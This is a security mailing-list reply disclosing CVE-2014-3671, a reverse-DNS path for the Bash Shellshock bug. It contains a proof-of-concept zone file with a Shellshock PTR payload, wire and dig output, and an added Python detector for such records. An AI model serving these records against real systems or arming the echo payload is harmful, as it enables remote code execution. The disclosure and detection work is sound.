
Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)



On 14 Oct 2014, at 13:04, Florian Weimer <fw@xxxxxxxxxxxxx> wrote:

>> A simple zone file; such as:
>> 
>>     $TTL 10;
>>     $ORIGIN in-addr.arpa.
>>     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
>>                    666        ; serial
>>                    360 180 3600 1800 ; very short lifespan.
>>                    )
>>     IN          NS     127.0.0.1
>>     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
> 
> I'm surprised DNS servers grok this, should be
> 
> * IN PTR 
> \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
> 
> Or something similar.

The production versions of NSD accept this fine ‘as is’ (FreeBSD-9.3); bind 
requires a bit of careful escaping.

On the wire one then sees the raw ‘binary’ — which can indeed be very raw:

000001d0  XX XX XX XX 31 28 29 20  7b 20 3a 3b 7d 3b 20 65        () { :;}; e|
000001e0  63 68 6f 20 63 76 65 2d  32 30 31 34 2d 36 32 37  |cho cve-2014-627|
000001f0  31 2c 20 63 76 65 2d 32  30 31 34 30 37 31 36 39  |1, cve-201407169|
00000200  2c 20 72 64 6e 73 c0 14  c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

        4.3.2.1.in-addr.arpa.   10      IN      PTR     
\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which normal unix libc/resolve does). And then we 
found at least one setenv() which would *de-escape* the above nicely - getting the 
octal and decimal right.

Dw.
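
As an added example, not part of this thread or of NSD/bind, the following Python decodes the presentation-format escapes that dig prints (the `\032` spaces and `\(`, `\;` characters shown above, per RFC 1035 §5.1) and flags a PTR target that decodes to a bash function-definition prefix. The sample input is constructed from the dig line quoted above plus an invented benign record (`host5.example.net.`).

```python
import re

# DNS presentation-format escapes (RFC 1035 s5.1): "\DDD" is one byte given as
# three decimal digits, "\X" is the literal character X.
_ESCAPE = re.compile(r'\\(\d{3}|.)', re.DOTALL)

def unescape_dns_presentation(text: str) -> str:
    """Decode a name as printed by dig back to the raw characters on the wire."""
    def repl(m):
        tok = m.group(1)
        if len(tok) == 3 and tok.isdigit():
            code = int(tok)
            if code > 255:
                raise ValueError(f"escape out of range: \\{tok}")
            return chr(code)
        return tok
    return _ESCAPE.sub(repl, text)

# Shellshock marker: bash treats an environment value that starts with "() {"
# as a function definition. The spaces arrive escaped as \032 in dig output,
# so the check must run on the decoded string, not on the escaped one.
_SHELLSHOCK = re.compile(r'^\s*\(\)\s*\{')

def looks_like_shellshock(ptr_target: str) -> bool:
    """True when a PTR target decodes to a bash function-definition prefix."""
    return bool(_SHELLSHOCK.match(unescape_dns_presentation(ptr_target)))

# Constructed sample: the dig answer quoted in the post plus a benign record.
SAMPLE_DIG_LINES = [
    r"4.3.2.1.in-addr.arpa.   10      IN      PTR     \(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.",
    r"5.3.2.1.in-addr.arpa.   3600    IN      PTR     host5.example.net.",
]

def flag_ptr_answers(lines):
    """Return (owner, decoded target) for every PTR answer that looks hostile."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5 or fields[3] != "PTR":
            continue
        target = fields[4]  # escaped, so it contains no literal whitespace
        if looks_like_shellshock(target):
            hits.append((fields[0], unescape_dns_presentation(target)))
    return hits

if __name__ == "__main__":
    for owner, decoded in flag_ptr_answers(SAMPLE_DIG_LINES):
        print(f"{owner} -> {decoded!r}")
```

The same decoder applies to any record type whose RDATA a resolver library may hand to an application as a string, which is the path the post describes for setenv().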


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/